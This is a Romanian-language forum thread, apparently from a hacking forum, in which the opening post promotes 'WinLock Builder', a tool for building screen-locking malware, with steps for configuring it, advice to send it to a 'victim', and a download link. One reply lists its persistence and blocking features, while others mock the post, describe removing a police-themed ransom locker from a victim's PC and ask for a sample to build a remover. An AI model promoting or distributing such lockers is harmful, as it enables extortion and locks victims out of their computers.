Jump to content
shuriq

WinLocker: Soft de facut 'misto'

Recommended Posts

Salut, poate ca stiti, poate ca nu de un soft pe nume : WinLock Builder.

Creatorul este un 'malefic coder rus' care are ceva minte, pe nume "VAN32", (numele real Ioan).

Deci sa va explic pe scurt ce face,

1.Creati un executabil cu ce text vreti voi, puneti o parola care o stiti doar voi.

2.Trimiti la o (jertfa), el deschide si bat o sa vedeti ce apare mai jos.

Niste poze mai jos cum configurati, si ce apare cand deschideti.

Soft-ul, configurarea si etc...

dadalm.png

Ce apare cand il deschideti.

dadadadar.png

Si, pentru astai cu "degete infipte", nu merge sa deschdeti Task Manager ca sa dati end proggres :P , fara parola nu faci nimic.

Desigur, toate astea cu antivirusul STINS, pana mea e un fel de doua feluri ce dumnezeu...

Link de download: WinLocker Builder_0.4.exe — RGhost — file sharing

Virus total: pana mea, nu stiu cum voua, dar mie nu-mi merge virustotal.com...

Unable to connect
Firefox can't establish a connection to the server at www.virustotal.com.

NU ABUZATI! mesaj pentru astia de 12 ani...

Link to comment
Share on other sites

Sincer nu stiu ce se intampla dar in ultima vreme citim doar threaduri cretine de ajutor (sa nu ma inteleaga unii gresit,ma refer la threaduri cum sa instalam un joc,cum sa inchid un pc ca iau prea multe "capshoturi in CS",etc.) si threaduri cretine ca si acesta.Alt loc unde sa postati virusi,stealere si alte porcarii nu aveti,chiar credeti ca o sa gasiti aici botanisti care sa execute toate rahaturile voastre?

Link to comment
Share on other sites

e un desktop locker slab.

ce atata galagie pe un pos asa tampit?

ps: nu-ti merge virustotal pt ca e adaugat ca exceptie in hosts

(ai descarcat "tool de mare hacker" si si-a facut de cap in pc-ul tau)

de ce sare toata lumea cu gura aiurea? sa faceti ceva bun/sa ajutati pe cineva nu stiti/puteti.

se umple net'u de "Hack Tools"

(Adevaratul hacking se face cu un singur tool "Creier.exe")

Le: @pustiiMariHackeri nu va obositi cu RST ca e pt Lameri. Adevarata Treaba e pe iSecurity ;)

Edited by yoyois
Link to comment
Share on other sites

* Completely blocks the entire desktop

* Locks the system keyboard shortcuts (Win, Alt + F4 ...)

* Prescribed in the startup

* Blocks all windows (including Task Manager)

* Blocks in safe mode

* The file deletes itself after you enter the secret password is removed from the system folder and startup

https://rstforums.com/forum/62459-vreau-virusul-politia-romana.rst#post410659

e acelasi soric de la craiova

Link to comment
Share on other sites

@spide112, nu cred ca le vei include pe toate, stiu cel putin una care nu e acolo

on topic: Cretinii au descoperit winlockeru si s-au gandit ca-i soft de facut misto, unii faceau bani cu el, trebuie doar sa stii ceva mai mult decat cele 2 cuvinte cu s*** p*** ))

Link to comment
Share on other sites

am mai intalnit acest "virus", un avocat m-a contactat ca ii apare un mesaj cu "Politia Romania" (si il punea sa introduca niste date de pe un card bancar sa plateasca o amenda). Era destul de incapatanat acel "virus", al draq si in safe mode aparea. Pana la urma am reusit sa il scot oprindui autoexecutarea care era un fisier prin C:/ cu numele "xcvcxvsdcfc.exe" (adica nume dat la intamplare)...

Link to comment
Share on other sites

@spide112, nu cred ca le vei include pe toate, stiu cel putin una care nu e acolo

on topic: Cretinii au descoperit winlockeru si s-au gandit ca-i soft de facut misto, unii faceau bani cu el, trebuie doar sa stii ceva mai mult decat cele 2 cuvinte cu s*** p*** ))

Ajuta comunitatea, posteaza o monstra a lockeruli ca sa pot sa-l adaug

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...